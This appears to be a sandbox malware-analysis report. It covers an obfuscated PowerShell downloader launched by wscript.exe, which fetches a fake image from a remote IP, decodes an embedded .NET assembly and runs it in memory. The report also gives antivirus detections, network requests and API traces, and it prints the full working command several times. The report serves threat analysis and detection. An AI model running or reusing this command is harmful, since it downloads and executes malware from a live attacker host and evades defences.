cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
filepath: powershell
1 1 0
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.VBS.SLoad.gen
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
ZoneAlarm HEUR:Trojan-Downloader.VBS.SLoad.gen
Varist VBS/Agent.BNM!Eldorado
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received žžDŠ^àÍ× *»¥Ùµ'Ò8DŽˆÆ·­û^UÕ]H,^œ`&û!ŠäSgŽõ«kÝ&iN –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 91.92.254.14
host 91.92.254.194
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0

send

 buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1416
sent: 83
1 83 0
parent_process wscript.exe martian_process powershell -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe